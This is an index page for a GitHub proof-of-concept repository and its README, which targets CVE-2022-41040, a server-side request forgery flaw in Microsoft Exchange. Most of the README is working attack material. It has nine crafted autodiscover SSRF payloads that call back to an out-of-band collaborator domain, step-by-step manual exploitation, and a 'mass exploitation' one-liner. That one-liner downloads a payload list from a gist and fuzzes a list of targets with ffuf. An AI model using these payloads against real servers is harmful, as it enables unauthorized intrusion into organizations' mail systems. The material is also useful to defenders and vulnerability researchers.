Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/kljunowsky/CVE-2022-41040-POC

CVE-2022-41040 - Server Side Request Forgery (SSRF) in Microsoft Exchange Server
https://github.com/kljunowsky/CVE-2022-41040-POC

bug-bounty bugbounty cve-2022-41040 exploit hacking microsoft microsoft-exchange poc proof-of-concept security ssrf

Last synced: about 1 month ago
JSON representation

CVE-2022-41040 - Server Side Request Forgery (SSRF) in Microsoft Exchange Server

Host: GitHub
URL: https://github.com/kljunowsky/CVE-2022-41040-POC
Owner: kljunowsky
Created: 2022-10-09T15:27:40.000Z (almost 2 years ago)
Default Branch: main
Last Pushed: 2023-01-21T01:57:59.000Z (over 1 year ago)
Last Synced: 2024-06-06T20:02:34.791Z (3 months ago)
Topics: bug-bounty, bugbounty, cve-2022-41040, exploit, hacking, microsoft, microsoft-exchange, poc, proof-of-concept, security, ssrf
Language: Python
Homepage:
Size: 3.91 KB
Stars: 89
Watchers: 2
Forks: 13
Open Issues: 1
Metadata Files:
- Readme: README.md

Awesome Lists containing this project

awesome-hacking-lists - kljunowsky/CVE-2022-41040-POC - CVE-2022-41040 - Server Side Request Forgery (SSRF) in Microsoft Exchange Server (Python)

README

# CVE-2022-41040-POC
CVE-2022-41040 - Server Side Request Forgery (SSRF) in Microsoft Exchange Server

## Manual exploiation

1. Replace `COLLABHERE` with your OOB domain - `sed 's/COLLABHERE//g`

2. Add payloads next to URLs you want to test - `echo http://target.com|unfurl format %s://%d/`

3. Visit crafted URLs

4. Check your collaborator

Payloads:
```
/autodiscover/autodiscover.json?@%d.v1.COLLABHERE/&Email=autodiscover/autodiscover.json%3f@%d.v1.COLLABHERE
/autodiscover/autodiscover.json/v1.0/aa@%d.v2.COLLABHERE?Protocol=Autodiscoverv1
/autodiscover/autodiscover.json/v1.0/aa..@%d.v3.COLLABHERE/owa/?&Email=autodiscover/autodiscover.json?a..@%d.v3.COLLABHERE&Protocol=Autodiscoverv1&Protocol=Powershell
/autodiscover/autodiscover.json/v1.0/aa@%d.v4.COLLABHERE/owa/?&Email=autodiscover/autodiscover.json?a@%d.v4.COLLABHERE&Protocol=Autodiscoverv1&Protocol=Powershell
/autodiscover/autodiscover.json?aa..%d.v5.COLLABHERE/owa/?&Email=autodiscover/autodiscover.json?a..%d.v5.COLLABHERE&Protocol=Autodiscoverv1&%d.v5.COLLABHEREProtocol=Powershell
/autodiscover/autodiscover.json?aa@%d.v6.COLLABHERE/owa/?&Email=autodiscover/autodiscover.json?a@%d.v6.COLLABHERE&Protocol=Autodiscoverv1&%d.v6.COLLABHEREProtocol=Powershell
/autodiscover/autodiscover.json?aa..%d.v7.COLLABHERE/owa/?&Email=aa@autodiscover/autodiscover.json?a..%d.v7.COLLABHERE&Protocol=Autodiscoverv1&%d.v7.COLLABHEREProtocol=Powershell
/autodiscover/autodiscover.json?aa@%d.v8.COLLABHERE/owa/?&Email=aa@autodiscover/autodiscover.json?a@%d.v8.COLLABHERE&Protocol=Autodiscoverv1&%d.v8.COLLABHEREProtocol=Powershell
/autodiscover/autodiscover.json/v1.0/aa@autodiscover/autodiscover.json?a..@%d.v9.COLLABHERE&Protocol=Autodiscoverv1&Protocol=Powershell
```

## Mass exploitation

```
for url in $(curl -s https://gist.githubusercontent.com/kljunowsky/a2e8392f63fb8d7c0443f2011bce59ec/raw/7b4cabaa0dab7113b1cab00e1a2cb0c4e3c6ed06/cve-2022-41040-unfurl-payloads.txt|sed 's/COLLABHERE//g'); do cat targets.txt |unfurl format $url >> fuzz-ready.txt;done & ffuf -w fuzz-ready.txt -u FUZZ
```

Check your collaborator!

Happy hunting!

### Requirements
[ffuf](https://github.com/ffuf/ffuf)
Thanks [@joohoi](https://github.com/joohoi)!

[unfurl](https://github.com/tomnomnom/unfurl)
Thanks [tomnomnom](https://github.com/tomnomnom)!

[Twitter](https://twitter.com/milanshiftsec)

[LinkedIn](https://www.linkedin.com/in/milan-jovic-sec/)